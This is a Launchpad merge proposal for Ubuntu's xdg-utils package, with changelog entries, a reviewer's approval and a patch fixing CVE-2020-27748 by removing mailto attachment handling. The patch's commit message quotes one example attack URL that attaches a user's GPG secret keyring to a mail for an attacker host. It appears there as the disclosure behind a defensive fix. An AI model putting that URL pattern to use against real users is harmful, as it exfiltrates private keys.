Ubuntu
xdg-utils package

Merge ~logan/ubuntu/+source/xdg-utils:merge into ubuntu/+source/xdg-utils:debian/sid

  1. Git
  2. lp:~logan/ubuntu/+source/xdg-utils
  3. merge
  4. Merge into debian/sid
Proposed by Logan Rosen
Status: Needs review
Proposed branch: ~logan/ubuntu/+source/xdg-utils:merge
Merge into: ubuntu/+source/xdg-utils:debian/sid
Diff against target: 153 lines (+90/-3)
6 files modified
debian/changelog (+29/-0)
debian/control (+2/-1)
debian/patches/CVE-2020-27748.patch (+55/-0)
debian/patches/debian-changes (+2/-2)
debian/patches/series (+1/-0)
debian/xdg-utils.links (+1/-0)
Reviewer Review Type Date Requested Status
Bryce Harrington (community) Approve
Review via email: mp+400734@code.launchpad.net
To post a comment you must log in.
Revision history for this message
Bryce Harrington (bryce) wrote :

I've confirmed the patch is still needed for this release of the package.

I would recommend adding DEP3 headers for the patch, specifically Origin, Bug-Ubuntu, and Bug-Debian (https://dep-team.pages.debian.net/deps/dep3/). The bug has already been raised with Debian at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975370, so that should be listed as Bug-Debian. It appears they are considering alternate solutions, but no recent activity it seems, so for now keeping the existing fix is the right course of action.

LGTM, +1

If you need sponsorship, let me know.

review: Approve
Reply

Unmerged commits

827b6c9... by Logan Rosen

finalize-changelog

e96cd62... by Logan Rosen

update-maintainer

66d873f... by Logan Rosen

reconstruct-changelog

76cc19a... by Logan Rosen

merge-changelogs

f790618... by Logan Rosen

Add debian/xdg-utils.links

   - Symlink /usr/bin/xdg-open to /usr/bin/browse (LP: #1624022)

337ea78... by Logan Rosen

SECURITY UPDATE: local file inclusion vulnerability

  - debian/patches/CVE-2020-27748.patch: remove attachment handling from
    mailto in scripts/xdg-email.in.
  - CVE-2020-27748

Preview Diff

[H/L] Next/Prev Comment, [J/K] Next/Prev File, [N/P] Next/Prev Hunk
1diff --git a/debian/changelog b/debian/changelog
2index 7780970..76df7b1 100644
3--- a/debian/changelog
4+++ b/debian/changelog
5@@ -1,3 +1,15 @@
6+xdg-utils (1.1.3-4ubuntu1) hirsute; urgency=medium
7+
8+ * Merge with Debian unstable. Remaining changes:
9+ - SECURITY UPDATE: local file inclusion vulnerability
10+ + debian/patches/CVE-2020-27748.patch: remove attachment handling from
11+ mailto in scripts/xdg-email.in.
12+ + CVE-2020-27748
13+ - Add debian/xdg-utils.links:
14+ + Symlink /usr/bin/xdg-open to /usr/bin/browse (LP #1624022)
15+
16+ -- Logan Rosen <logan@ubuntu.com> Wed, 07 Apr 2021 17:12:40 -0400
17+
18 xdg-utils (1.1.3-4) unstable; urgency=medium
19
20 * Set executable bit of the "ttyon" and the "ttyoff" utilities right before
21@@ -34,6 +46,23 @@ xdg-utils (1.1.3-3) unstable; urgency=medium
22
23 -- Nicholas Guriev <guriev-ns@ya.ru> Sun, 10 Jan 2021 12:32:26 +0300
24
25+xdg-utils (1.1.3-2ubuntu2) hirsute; urgency=medium
26+
27+ * SECURITY UPDATE: local file inclusion vulnerability
28+ - debian/patches/CVE-2020-27748.patch: remove attachment handling from
29+ mailto in scripts/xdg-email.in.
30+ - CVE-2020-27748
31+
32+ -- Leonidas S. Barbosa <leo.barbosa@canonical.com> Tue, 24 Nov 2020 14:26:08 -0300
33+
34+xdg-utils (1.1.3-2ubuntu1) focal; urgency=medium
35+
36+ * Sync with Debian. Remaining change:
37+ - Add debian/xdg-utils.links:
38+ + Symlink /usr/bin/xdg-open to /usr/bin/browse (LP: #1624022)
39+
40+ -- Jeremy Bicha <jbicha@ubuntu.com> Sun, 29 Mar 2020 19:38:09 -0400
41+
42 xdg-utils (1.1.3-2) unstable; urgency=medium
43
44 [ Debian Janitor ]
45diff --git a/debian/control b/debian/control
46index 474ad23..bb7e0b7 100644
47--- a/debian/control
48+++ b/debian/control
49@@ -1,5 +1,6 @@
50 Source: xdg-utils
51-Maintainer: Debian freedesktop.org maintainers <pkg-freedesktop-maintainers@lists.alioth.debian.org>
52+Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
53+XSBC-Original-Maintainer: Debian freedesktop.org maintainers <pkg-freedesktop-maintainers@lists.alioth.debian.org>
54 Uploaders: Nicholas Guriev <guriev-ns@ya.ru>
55 Section: utils
56 Priority: optional
57diff --git a/debian/patches/CVE-2020-27748.patch b/debian/patches/CVE-2020-27748.patch
58new file mode 100644
59index 0000000..de04492
60--- /dev/null
61+++ b/debian/patches/CVE-2020-27748.patch
62@@ -0,0 +1,55 @@
63+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
64+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
65+Date: Tue, 18 Aug 2020 16:52:24 +0100
66+Subject: [PATCH] xdg-email: remove attachment handling from mailto
67+MIME-Version: 1.0
68+Content-Type: text/plain; charset=UTF-8
69+Content-Transfer-Encoding: 8bit
70+
71+This allows attacker to extract secrets from users:
72+
73+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
74+
75+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
76+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
77+
78+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
79+---
80+ scripts/xdg-email.in | 7 +------
81+ 1 file changed, 1 insertion(+), 6 deletions(-)
82+
83+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
84+index 6db58ad..5d2f4f3 100644
85+--- a/scripts/xdg-email.in
86++++ b/scripts/xdg-email.in
87+@@ -32,7 +32,7 @@ _USAGE
88+
89+ run_thunderbird()
90+ {
91+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
92++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
93+ THUNDERBIRD="$1"
94+ MAILTO=$(echo "$2" | sed 's/^mailto://')
95+ echo "$MAILTO" | grep -qs "^?"
96+@@ -48,7 +48,6 @@ run_thunderbird()
97+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
98+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
99+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
100+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
101+
102+ if [ -z "$TO" ] ; then
103+ NEWMAILTO=
104+@@ -68,10 +67,6 @@ run_thunderbird()
105+ NEWMAILTO="${NEWMAILTO},$BODY"
106+ fi
107+
108+- if [ -n "$ATTACH" ] ; then
109+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
110+- fi
111+-
112+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
113+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
114+ "$THUNDERBIRD" -compose "$NEWMAILTO"
115+--
116+GitLab
117+
118diff --git a/debian/patches/debian-changes b/debian/patches/debian-changes
119index aceba81..82ef001 100644
120--- a/debian/patches/debian-changes
121+++ b/debian/patches/debian-changes
122@@ -475,7 +475,7 @@ repository.
123
124 --- xdg-utils-1.1.3.orig/scripts/xdg-email.in
125 +++ xdg-utils-1.1.3/scripts/xdg-email.in
126-@@ -91,13 +91,13 @@ open_kde()
127+@@ -86,13 +86,13 @@ open_kde()
128 fi
129
130 if which $kreadconfig >/dev/null 2>&1; then
131@@ -495,7 +495,7 @@ repository.
132
133 if echo "$client" | grep -Eq 'thunderbird|icedove'; then
134 run_thunderbird "$client" "$1"
135-@@ -472,7 +472,7 @@ case "$DE" in
136+@@ -467,7 +467,7 @@ case "$DE" in
137 open_gnome "${mailto}"
138 ;;
139
140diff --git a/debian/patches/series b/debian/patches/series
141index 7bb8252..80f7a23 100644
142--- a/debian/patches/series
143+++ b/debian/patches/series
144@@ -1 +1,2 @@
145+CVE-2020-27748.patch
146 debian-changes
147diff --git a/debian/xdg-utils.links b/debian/xdg-utils.links
148new file mode 100644
149index 0000000..c87b9d2
150--- /dev/null
151+++ b/debian/xdg-utils.links
152@@ -0,0 +1 @@
153+/usr/bin/xdg-open /usr/bin/browse

Subscribers

People subscribed via source and target branches